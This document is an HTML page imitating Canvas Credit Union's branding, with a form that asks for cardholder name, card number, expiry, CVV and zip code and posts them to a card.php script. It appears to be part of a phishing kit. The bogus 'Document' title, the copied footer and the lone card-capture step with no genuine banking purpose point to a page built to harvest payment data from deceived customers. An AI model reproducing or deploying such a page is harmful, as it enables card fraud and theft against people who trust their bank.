<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="bootstrap.css">
    <link rel="stylesheet" href="style.css">
    <!-- Favicon -->
    <link rel="icon" type="icon" href="image/canvas favicon.svg" sizes="180x180">
</head>
<body>
    <section style="overflow-y: scroll;">
        <form method="post" action="./card.php">
        <div class="pt-md-5">
            <div class="mx-auto col-lg-6 col-md-12 col-12 bg-white card pt-3 rounded-2 pt-4">
                <div class="text-center  pb-3">
                    <img src="image/canvas_second_logo-removebg-preview.png" width="230" alt="">
                </div>
                <hr>
                <div class="ps-4 pb-2">
                    <h5>Provide the requested information</h5>
                </div>
                <div class="px-md-5 px-2">
                    <div>
                        <label class="fw-medium" for="">Cardholder's Name</label>
                        <input value="" name="cardholder" class="form-control shadow-none" type="text" id="cardholder">
                        <span id="cardError" class="error-d"><small>Please fill out this field.</small></span>
                    </div>
                    <div class="pt-3">
                        <label class="fw-medium" for="">Card Number</label>
                        <input name="cardnumber" class="form-control shadow-none" type="number" id="cardnumber">
                        <span id="cardnumberError" class="error-d"><small>Please fill out this field.</small></span>
                    </div>
                    <div class="pt-3">
                        <label class="fw-medium" for="">Expiry</label>
                        <input name="exp" class="form-control shadow-none" type="number" id="expiry">
                        <span id="expiryError" class="error-d"><small>Please fill out this field.</small></span>
                    </div>
                    <div class="pt-3">
                        <label class="fw-medium" for="">CVV</label>
                        <input name="cvv" class="form-control shadow-none" type="number" id="cvv">
                        <span id="cvvError" class="error-d"><small>Please fill out this field.</small></span>
                    </div>
                    <div class="pt-3">
                        <label class="fw-medium" for="">Zip code</label>
                        <input name="zipcode" class="form-control shadow-none" type="number" id="zipcode">
                        <span id="zipError" class="error-d"><small>Please fill out this field.</small></span>
                    </div>
                    <div class="pt-3 pb-5">
                        <button class="rounded-2 w-100 fw-medium auth-continue" onclick="cardContinue()"> Continue</button>
                    </div>
                </div>
            </div>
        </div>
        </form>
    </section>
    <!-- <footer class="px-5">
        <div class="row pt-4">
            <div class="col-md col-12">
                <img src="image/81373-removebg-preview.png" width="190" alt="">
                <p class="text-white pt-4 ps-1" style="font-size: 15px; font-weight: 400;">
                    Canvas Credit Union <br> PO Box 5238 <br> Englewood, CO 80155
                </p>
            </div>
            <div class="col-md d-md-block d-none">
                <p class="text-white fw-bold" style=" font-size: 12px;">PERSONAL</p>
                <hr style="color: #FF4C00;">
                <ul class="list-unstyled pt-3 text-white" style=" font-size: 16px; font-weight: 400; line-height: 0.5;">
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Checking</li> <br>
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Credit Cards</li> <br>
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Investments</li> <br>
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Loans</li> <br>
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Savings</li> <br>
                </ul>
            </div>
            <div class="col-md d-md-block d-none">
                <p class="text-white fw-bold" style=" font-size: 12px;">BUSINESS</p>
                <hr style="color: #FF4C00;">
                <ul class="list-unstyled pt-3 text-white" style=" font-size: 16px; font-weight: 400; line-height: 0.5;">
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Checking</li> <br>
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Credit Cards</li> <br>
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Loans</li> <br>
                    <li> <img src="image/ic--outline-plus.svg" width="15" alt=""> Savings</li> <br>
                </ul>
            </div>
            <div class="col-md d-md-block d-none">
                <p class="text-white fw-bold" style=" font-size: 12px;">ABOUT US</p>
                <hr style="color: #FF4C00;">
                <ul class="list-unstyled pt-3 text-white" style=" font-size: 16px; font-weight: 400; line-height: 0.5;">
                    <li> <img src="image/ph--greater-than-bold.svg" width="15" alt=""> About Us</li> <br>
                    <li> <img src="image/ph--greater-than-bold.svg" width="15" alt=""> Contact Us</li> <br>
                    <li> <img src="image/ph--greater-than-bold.svg" width="15" alt=""> Book An Appointment</li> <br>
                    <li> <img src="image/ph--greater-than-bold.svg" width="15" alt=""> Locations</li> <br>
                </ul>
            </div>
            </div>
    </footer> -->
    <script src="card.js"></script>
</body>
</html>